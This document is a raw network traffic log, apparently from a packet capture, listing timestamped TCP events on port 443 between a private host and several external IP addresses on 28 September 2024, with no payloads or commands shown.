                                                                                                                                                                                            Sep 28, 2024 05:39:39.008831978 CEST49826443192.168.2.5185.220.152.26
                                                                                                                                                                                            Sep 28, 2024 05:39:39.009073019 CEST44349826185.220.152.26192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:39.009085894 CEST44349826185.220.152.26192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:39.009140015 CEST49826443192.168.2.5185.220.152.26
                                                                                                                                                                                            Sep 28, 2024 05:39:39.009926081 CEST44349826185.220.152.26192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:39.009934902 CEST44349826185.220.152.26192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:39.010003090 CEST49826443192.168.2.5185.220.152.26
                                                                                                                                                                                            Sep 28, 2024 05:39:39.010118961 CEST44349826185.220.152.26192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:39.010175943 CEST49826443192.168.2.5185.220.152.26
                                                                                                                                                                                            Sep 28, 2024 05:39:39.024544001 CEST443498388.211.203.165192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:39.024564981 CEST443498388.211.203.165192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:39.024584055 CEST443498388.211.203.165192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:39.024653912 CEST49838443192.168.2.58.211.203.165
                                                                                                                                                                                            Sep 28, 2024 05:39:39.024674892 CEST443498388.211.203.165192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:39.024729013 CEST49838443192.168.2.58.211.203.165
                                                                                                                                                                                            Sep 28, 2024 05:39:39.027395010 CEST443498408.211.203.165192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:39.029706955 CEST49837443192.168.2.58.211.203.165
                                                                                                                                                                                            Sep 28, 2024 05:39:39.040503025 CEST443498388.211.203.165192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:39.040523052 CEST443498388.211.203.165192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:39.040584087 CEST49838443192.168.2.58.211.203.165
                                                                                                                                                                                            Sep 28, 2024 05:39:39.040596008 CEST443498388.211.203.165192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:39.057435036 CEST443498378.211.203.165192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:39.057449102 CEST443498378.211.203.165192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:39.057470083 CEST443498378.211.203.165192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:39.057545900 CEST49837443192.168.2.58.211.203.165
                                                                                                                                                                                            Sep 28, 2024 05:39:39.057558060 CEST443498378.211.203.165192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:39.057588100 CEST49837443192.168.2.58.211.203.165
                                                                                                                                                                                            Sep 28, 2024 05:39:39.057600975 CEST49837443192.168.2.58.211.203.165
                                                                                                                                                                                            Sep 28, 2024 05:39:39.058865070 CEST44349825185.220.152.26192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:39.058949947 CEST49825443192.168.2.5185.220.152.26
                                                                                                                                                                                            Sep 28, 2024 05:39:39.059381962 CEST44349825185.220.152.26192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:39.059451103 CEST49825443192.168.2.5185.220.152.26
                                                                                                                                                                                            Sep 28, 2024 05:39:39.059814930 CEST44349825185.220.152.26192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:39.059883118 CEST49825443192.168.2.5185.220.152.26
                                                                                                                                                                                            Sep 28, 2024 05:39:39.060148954 CEST44349825185.220.152.26192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:39.060219049 CEST49825443192.168.2.5185.220.152.26
                                                                                                                                                                                            Sep 28, 2024 05:39:39.076217890 CEST443498378.211.203.165192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:39.076241016 CEST443498378.211.203.165192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:39.076284885 CEST49837443192.168.2.58.211.203.165
                                                                                                                                                                                            Sep 28, 2024 05:39:39.076286077 CEST443498378.211.203.165192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:39.076299906 CEST443498378.211.203.165192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:39.076332092 CEST49837443192.168.2.58.211.203.165
                                                                                                                                                                                            Sep 28, 2024 05:39:39.076350927 CEST49837443192.168.2.58.211.203.165
                                                                                                                                                                                            Sep 28, 2024 05:39:39.076355934 CEST443498378.211.203.165192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:39.076394081 CEST443498378.211.203.165192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:39.076437950 CEST49837443192.168.2.58.211.203.165
                                                                                                                                                                                            Sep 28, 2024 05:39:39.077743053 CEST49837443192.168.2.58.211.203.165
                                                                                                                                                                                            Sep 28, 2024 05:39:39.077759981 CEST443498378.211.203.165192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:39.087040901 CEST49843443192.168.2.58.211.203.165
                                                                                                                                                                                            Sep 28, 2024 05:39:39.087081909 CEST443498438.211.203.165192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:39.087177038 CEST49843443192.168.2.58.211.203.165
                                                                                                                                                                                            Sep 28, 2024 05:39:39.087395906 CEST49843443192.168.2.58.211.203.165
                                                                                                                                                                                            Sep 28, 2024 05:39:39.087404966 CEST443498438.211.203.165192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:39.090404034 CEST49838443192.168.2.58.211.203.165
                                                                                                                                                                                            Sep 28, 2024 05:39:39.112168074 CEST443498388.211.203.165192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:39.112190962 CEST443498388.211.203.165192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:39.112265110 CEST49838443192.168.2.58.211.203.165
                                                                                                                                                                                            Sep 28, 2024 05:39:39.112293005 CEST443498388.211.203.165192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:39.112405062 CEST49838443192.168.2.58.211.203.165
                                                                                                                                                                                            Sep 28, 2024 05:39:39.126956940 CEST443498388.211.203.165192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:39.127024889 CEST443498388.211.203.165192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:39.127048969 CEST49838443192.168.2.58.211.203.165
                                                                                                                                                                                            Sep 28, 2024 05:39:39.127063990 CEST443498388.211.203.165192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:39.127074003 CEST443498388.211.203.165192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:39.127095938 CEST49838443192.168.2.58.211.203.165
                                                                                                                                                                                            Sep 28, 2024 05:39:39.127115965 CEST49838443192.168.2.58.211.203.165
                                                                                                                                                                                            Sep 28, 2024 05:39:39.127451897 CEST49838443192.168.2.58.211.203.165
                                                                                                                                                                                            Sep 28, 2024 05:39:39.127468109 CEST443498388.211.203.165192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:39.137460947 CEST49844443192.168.2.58.211.203.165
                                                                                                                                                                                            Sep 28, 2024 05:39:39.137552977 CEST443498448.211.203.165192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:39.137643099 CEST49844443192.168.2.58.211.203.165
                                                                                                                                                                                            Sep 28, 2024 05:39:39.138183117 CEST49844443192.168.2.58.211.203.165
                                                                                                                                                                                            Sep 28, 2024 05:39:39.138216972 CEST443498448.211.203.165192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:39.141550064 CEST44349826185.220.152.26192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:39.141613960 CEST49826443192.168.2.5185.220.152.26
                                                                                                                                                                                            Sep 28, 2024 05:39:39.142128944 CEST44349826185.220.152.26192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:39.142199993 CEST49826443192.168.2.5185.220.152.26
                                                                                                                                                                                            Sep 28, 2024 05:39:39.142414093 CEST44349826185.220.152.26192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:39.142486095 CEST49826443192.168.2.5185.220.152.26
                                                                                                                                                                                            Sep 28, 2024 05:39:39.142795086 CEST44349826185.220.152.26192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:39.142863035 CEST49826443192.168.2.5185.220.152.26
                                                                                                                                                                                            Sep 28, 2024 05:39:39.143476963 CEST44349826185.220.152.26192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:39.143531084 CEST49826443192.168.2.5185.220.152.26
                                                                                                                                                                                            Sep 28, 2024 05:39:39.143662930 CEST44349826185.220.152.26192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:39.143719912 CEST49826443192.168.2.5185.220.152.26
                                                                                                                                                                                            Sep 28, 2024 05:39:39.144373894 CEST44349826185.220.152.26192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:39.144433022 CEST49826443192.168.2.5185.220.152.26
                                                                                                                                                                                            Sep 28, 2024 05:39:39.144613981 CEST44349826185.220.152.26192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:39.144670963 CEST49826443192.168.2.5185.220.152.26
                                                                                                                                                                                            Sep 28, 2024 05:39:39.167540073 CEST4434984235.201.78.44192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:39.167970896 CEST49842443192.168.2.535.201.78.44
                                                                                                                                                                                            Sep 28, 2024 05:39:39.167989016 CEST4434984235.201.78.44192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:39.168972969 CEST4434984235.201.78.44192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:39.169019938 CEST49842443192.168.2.535.201.78.44
                                                                                                                                                                                            Sep 28, 2024 05:39:39.172746897 CEST49842443192.168.2.535.201.78.44
                                                                                                                                                                                            Sep 28, 2024 05:39:39.172799110 CEST4434984235.201.78.44192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:39.173120975 CEST49842443192.168.2.535.201.78.44
                                                                                                                                                                                            Sep 28, 2024 05:39:39.173126936 CEST4434984235.201.78.44192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:39.192723989 CEST44349825185.220.152.26192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:39.192835093 CEST49825443192.168.2.5185.220.152.26
                                                                                                                                                                                            Sep 28, 2024 05:39:39.192852020 CEST44349825185.220.152.26192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:39.192894936 CEST49825443192.168.2.5185.220.152.26
                                                                                                                                                                                            Sep 28, 2024 05:39:39.193036079 CEST44349825185.220.152.26192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:39.193094969 CEST49825443192.168.2.5185.220.152.26
                                                                                                                                                                                            Sep 28, 2024 05:39:39.193254948 CEST44349826185.220.152.26192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:39.193382978 CEST49826443192.168.2.5185.220.152.26
                                                                                                                                                                                            Sep 28, 2024 05:39:39.193531036 CEST44349825185.220.152.26192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:39.193569899 CEST49825443192.168.2.5185.220.152.26
                                                                                                                                                                                            Sep 28, 2024 05:39:39.193576097 CEST44349825185.220.152.26192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:39.193603992 CEST44349825185.220.152.26192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:39.193624973 CEST49825443192.168.2.5185.220.152.26
                                                                                                                                                                                            Sep 28, 2024 05:39:39.193650007 CEST49825443192.168.2.5185.220.152.26
                                                                                                                                                                                            Sep 28, 2024 05:39:39.194372892 CEST49825443192.168.2.5185.220.152.26
                                                                                                                                                                                            Sep 28, 2024 05:39:39.194386005 CEST44349825185.220.152.26192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:39.214502096 CEST49842443192.168.2.535.201.78.44
                                                                                                                                                                                            Sep 28, 2024 05:39:39.235158920 CEST443498398.211.203.165192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:39.235188961 CEST443498398.211.203.165192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:39.235208988 CEST443498398.211.203.165192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:39.235265017 CEST49839443192.168.2.58.211.203.165
                                                                                                                                                                                            Sep 28, 2024 05:39:39.235354900 CEST443498398.211.203.165192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:39.235430002 CEST49839443192.168.2.58.211.203.165
                                                                                                                                                                                            Sep 28, 2024 05:39:39.235430956 CEST49839443192.168.2.58.211.203.165
                                                                                                                                                                                            Sep 28, 2024 05:39:39.249814987 CEST443498418.211.203.165192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:39.250754118 CEST49841443192.168.2.58.211.203.165
                                                                                                                                                                                            Sep 28, 2024 05:39:39.250772953 CEST443498418.211.203.165192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:39.250859022 CEST443498398.211.203.165192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:39.250895977 CEST443498398.211.203.165192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:39.250932932 CEST443498398.211.203.165192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:39.250933886 CEST49839443192.168.2.58.211.203.165
                                                                                                                                                                                            Sep 28, 2024 05:39:39.250981092 CEST49839443192.168.2.58.211.203.165
                                                                                                                                                                                            Sep 28, 2024 05:39:39.251477003 CEST49839443192.168.2.58.211.203.165
                                                                                                                                                                                            Sep 28, 2024 05:39:39.251512051 CEST443498398.211.203.165192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:39.251838923 CEST443498418.211.203.165192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:39.251899958 CEST49841443192.168.2.58.211.203.165
                                                                                                                                                                                            Sep 28, 2024 05:39:39.253899097 CEST49841443192.168.2.58.211.203.165
                                                                                                                                                                                            Sep 28, 2024 05:39:39.253963947 CEST443498418.211.203.165192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:39.254529953 CEST49841443192.168.2.58.211.203.165
                                                                                                                                                                                            Sep 28, 2024 05:39:39.254539967 CEST443498418.211.203.165192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:39.267934084 CEST443498408.211.203.165192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:39.267956972 CEST443498408.211.203.165192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:39.268007994 CEST443498408.211.203.165192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:39.268034935 CEST49840443192.168.2.58.211.203.165
                                                                                                                                                                                            Sep 28, 2024 05:39:39.268048048 CEST443498408.211.203.165192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:39.268084049 CEST49840443192.168.2.58.211.203.165
                                                                                                                                                                                            Sep 28, 2024 05:39:39.274728060 CEST44349826185.220.152.26192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:39.274825096 CEST49826443192.168.2.5185.220.152.26
                                                                                                                                                                                            Sep 28, 2024 05:39:39.274964094 CEST44349826185.220.152.26192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:39.275008917 CEST49826443192.168.2.5185.220.152.26
                                                                                                                                                                                            Sep 28, 2024 05:39:39.275202036 CEST44349826185.220.152.26192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:39.275245905 CEST49826443192.168.2.5185.220.152.26
                                                                                                                                                                                            Sep 28, 2024 05:39:39.275346994 CEST44349826185.220.152.26192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:39.275392056 CEST49826443192.168.2.5185.220.152.26
                                                                                                                                                                                            Sep 28, 2024 05:39:39.275687933 CEST44349826185.220.152.26192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:39.275721073 CEST44349826185.220.152.26192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:39.275732994 CEST49826443192.168.2.5185.220.152.26
                                                                                                                                                                                            Sep 28, 2024 05:39:39.275738955 CEST44349826185.220.152.26192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:39.275826931 CEST49826443192.168.2.5185.220.152.26
                                                                                                                                                                                            Sep 28, 2024 05:39:39.276010990 CEST44349826185.220.152.26192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:39.276072979 CEST49826443192.168.2.5185.220.152.26
                                                                                                                                                                                            Sep 28, 2024 05:39:39.276393890 CEST44349826185.220.152.26192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:39.276448011 CEST49826443192.168.2.5185.220.152.26
                                                                                                                                                                                            Sep 28, 2024 05:39:39.276648998 CEST44349826185.220.152.26192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:39.276691914 CEST49826443192.168.2.5185.220.152.26
                                                                                                                                                                                            Sep 28, 2024 05:39:39.282303095 CEST443498408.211.203.165192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:39.282358885 CEST443498408.211.203.165192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:39.282380104 CEST49840443192.168.2.58.211.203.165
                                                                                                                                                                                            Sep 28, 2024 05:39:39.282421112 CEST49840443192.168.2.58.211.203.165
                                                                                                                                                                                            Sep 28, 2024 05:39:39.282994032 CEST49840443192.168.2.58.211.203.165
                                                                                                                                                                                            Sep 28, 2024 05:39:39.283009052 CEST443498408.211.203.165192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:39.295144081 CEST49841443192.168.2.58.211.203.165
                                                                                                                                                                                            Sep 28, 2024 05:39:39.379553080 CEST4434984235.201.78.44192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:39.379585981 CEST4434984235.201.78.44192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:39.379610062 CEST4434984235.201.78.44192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:39.379632950 CEST4434984235.201.78.44192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:39.379641056 CEST49842443192.168.2.535.201.78.44
                                                                                                                                                                                            Sep 28, 2024 05:39:39.379659891 CEST4434984235.201.78.44192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:39.379677057 CEST49842443192.168.2.535.201.78.44
                                                                                                                                                                                            Sep 28, 2024 05:39:39.380206108 CEST4434984235.201.78.44192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:39.380243063 CEST49842443192.168.2.535.201.78.44
                                                                                                                                                                                            Sep 28, 2024 05:39:39.380249023 CEST4434984235.201.78.44192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:39.380283117 CEST4434984235.201.78.44192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:39.380335093 CEST49842443192.168.2.535.201.78.44
                                                                                                                                                                                            Sep 28, 2024 05:39:39.380337954 CEST4434984235.201.78.44192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:39.380914927 CEST4434984235.201.78.44192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:39.380939960 CEST4434984235.201.78.44192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:39.380951881 CEST49842443192.168.2.535.201.78.44
                                                                                                                                                                                            Sep 28, 2024 05:39:39.380955935 CEST4434984235.201.78.44192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:39.380985022 CEST49842443192.168.2.535.201.78.44
                                                                                                                                                                                            Sep 28, 2024 05:39:39.380989075 CEST4434984235.201.78.44192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:39.385009050 CEST4434984235.201.78.44192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:39.385081053 CEST4434984235.201.78.44192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:39.385102034 CEST49842443192.168.2.535.201.78.44
                                                                                                                                                                                            Sep 28, 2024 05:39:39.385153055 CEST49842443192.168.2.535.201.78.44
                                                                                                                                                                                            Sep 28, 2024 05:39:39.400933981 CEST49842443192.168.2.535.201.78.44
                                                                                                                                                                                            Sep 28, 2024 05:39:39.400952101 CEST4434984235.201.78.44192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:39.408224106 CEST44349826185.220.152.26192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:39.408273935 CEST49826443192.168.2.5185.220.152.26
                                                                                                                                                                                            Sep 28, 2024 05:39:39.408283949 CEST44349826185.220.152.26192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:39.408296108 CEST44349826185.220.152.26192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:39.408337116 CEST49826443192.168.2.5185.220.152.26
                                                                                                                                                                                            Sep 28, 2024 05:39:39.565258980 CEST443498418.211.203.165192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:39.565291882 CEST443498418.211.203.165192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:39.565299988 CEST443498418.211.203.165192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:39.565316916 CEST443498418.211.203.165192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:39.565346003 CEST443498418.211.203.165192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:39.565352917 CEST49841443192.168.2.58.211.203.165
                                                                                                                                                                                            Sep 28, 2024 05:39:39.565372944 CEST443498418.211.203.165192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:39.565397024 CEST49841443192.168.2.58.211.203.165
                                                                                                                                                                                            Sep 28, 2024 05:39:39.565428972 CEST49841443192.168.2.58.211.203.165
                                                                                                                                                                                            Sep 28, 2024 05:39:39.578146935 CEST443498418.211.203.165192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:39.578231096 CEST443498418.211.203.165192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:39.578241110 CEST49841443192.168.2.58.211.203.165
                                                                                                                                                                                            Sep 28, 2024 05:39:39.578279972 CEST49841443192.168.2.58.211.203.165
                                                                                                                                                                                            Sep 28, 2024 05:39:39.613456964 CEST49845443192.168.2.5185.220.152.26
                                                                                                                                                                                            Sep 28, 2024 05:39:39.613498926 CEST44349845185.220.152.26192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:39.613555908 CEST49845443192.168.2.5185.220.152.26
                                                                                                                                                                                            Sep 28, 2024 05:39:39.614854097 CEST49846443192.168.2.5185.220.152.26
                                                                                                                                                                                            Sep 28, 2024 05:39:39.614861012 CEST44349846185.220.152.26192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:39.614932060 CEST49846443192.168.2.5185.220.152.26
                                                                                                                                                                                            Sep 28, 2024 05:39:39.615612030 CEST49826443192.168.2.5185.220.152.26
                                                                                                                                                                                            Sep 28, 2024 05:39:39.615634918 CEST44349826185.220.152.26192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:39.619395018 CEST49847443192.168.2.5185.220.152.26
                                                                                                                                                                                            Sep 28, 2024 05:39:39.619417906 CEST44349847185.220.152.26192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:39.619478941 CEST49847443192.168.2.5185.220.152.26
                                                                                                                                                                                            Sep 28, 2024 05:39:39.619976997 CEST49848443192.168.2.5185.220.152.26
                                                                                                                                                                                            Sep 28, 2024 05:39:39.620059967 CEST44349848185.220.152.26192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:39.620137930 CEST49848443192.168.2.5185.220.152.26
                                                                                                                                                                                            Sep 28, 2024 05:39:39.683789015 CEST443498438.211.203.165192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:39.713346004 CEST49849443192.168.2.5185.220.152.26
                                                                                                                                                                                            Sep 28, 2024 05:39:39.713382006 CEST44349849185.220.152.26192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:39.713608027 CEST49849443192.168.2.5185.220.152.26
                                                                                                                                                                                            Sep 28, 2024 05:39:39.714982033 CEST49845443192.168.2.5185.220.152.26
                                                                                                                                                                                            Sep 28, 2024 05:39:39.715008974 CEST44349845185.220.152.26192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:39.715591908 CEST49846443192.168.2.5185.220.152.26
                                                                                                                                                                                            Sep 28, 2024 05:39:39.715600967 CEST44349846185.220.152.26192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:39.716013908 CEST49847443192.168.2.5185.220.152.26
                                                                                                                                                                                            Sep 28, 2024 05:39:39.716032982 CEST44349847185.220.152.26192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:39.716325998 CEST49848443192.168.2.5185.220.152.26
                                                                                                                                                                                            Sep 28, 2024 05:39:39.716367960 CEST44349848185.220.152.26192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:39.716737986 CEST49843443192.168.2.58.211.203.165
                                                                                                                                                                                            Sep 28, 2024 05:39:39.716753006 CEST443498438.211.203.165192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:39.716917992 CEST49849443192.168.2.5185.220.152.26
                                                                                                                                                                                            Sep 28, 2024 05:39:39.716928005 CEST44349849185.220.152.26192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:39.717411995 CEST443498438.211.203.165192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:39.719445944 CEST49843443192.168.2.58.211.203.165
                                                                                                                                                                                            Sep 28, 2024 05:39:39.719527960 CEST443498438.211.203.165192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:39.726144075 CEST49850443192.168.2.5185.220.152.26
                                                                                                                                                                                            Sep 28, 2024 05:39:39.726156950 CEST44349850185.220.152.26192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:39.726325989 CEST49850443192.168.2.5185.220.152.26
                                                                                                                                                                                            Sep 28, 2024 05:39:39.726624012 CEST49843443192.168.2.58.211.203.165
                                                                                                                                                                                            Sep 28, 2024 05:39:39.726839066 CEST49850443192.168.2.5185.220.152.26
                                                                                                                                                                                            Sep 28, 2024 05:39:39.726850033 CEST44349850185.220.152.26192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:39.727091074 CEST49841443192.168.2.58.211.203.165
                                                                                                                                                                                            Sep 28, 2024 05:39:39.727112055 CEST443498418.211.203.165192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:39.743037939 CEST443498448.211.203.165192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:39.743225098 CEST49844443192.168.2.58.211.203.165
                                                                                                                                                                                            Sep 28, 2024 05:39:39.743235111 CEST443498448.211.203.165192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:39.743566990 CEST443498448.211.203.165192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:39.743948936 CEST49844443192.168.2.58.211.203.165
                                                                                                                                                                                            Sep 28, 2024 05:39:39.743993044 CEST443498448.211.203.165192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:39.744105101 CEST49844443192.168.2.58.211.203.165
                                                                                                                                                                                            Sep 28, 2024 05:39:39.771398067 CEST443498438.211.203.165192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:39.787411928 CEST443498448.211.203.165192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:39.998752117 CEST443498438.211.203.165192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:39.998783112 CEST443498438.211.203.165192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:39.998823881 CEST443498438.211.203.165192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:39.998836994 CEST443498438.211.203.165192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:39.998972893 CEST49843443192.168.2.58.211.203.165
                                                                                                                                                                                            Sep 28, 2024 05:39:39.998972893 CEST49843443192.168.2.58.211.203.165
                                                                                                                                                                                            Sep 28, 2024 05:39:39.998992920 CEST443498438.211.203.165192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:39.999042034 CEST49843443192.168.2.58.211.203.165
                                                                                                                                                                                            Sep 28, 2024 05:39:40.012414932 CEST443498438.211.203.165192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:40.012439966 CEST443498438.211.203.165192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:40.012728930 CEST49843443192.168.2.58.211.203.165
                                                                                                                                                                                            Sep 28, 2024 05:39:40.012739897 CEST443498438.211.203.165192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:40.055880070 CEST49843443192.168.2.58.211.203.165
                                                                                                                                                                                            Sep 28, 2024 05:39:40.059705973 CEST443498448.211.203.165192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:40.059726954 CEST443498448.211.203.165192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:40.059750080 CEST443498448.211.203.165192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:40.059824944 CEST49844443192.168.2.58.211.203.165
                                                                                                                                                                                            Sep 28, 2024 05:39:40.059839964 CEST443498448.211.203.165192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:40.059896946 CEST49844443192.168.2.58.211.203.165
                                                                                                                                                                                            Sep 28, 2024 05:39:40.075927973 CEST443498448.211.203.165192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:40.075953007 CEST443498448.211.203.165192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:40.076019049 CEST49844443192.168.2.58.211.203.165
                                                                                                                                                                                            Sep 28, 2024 05:39:40.076025963 CEST443498448.211.203.165192.168.2.5
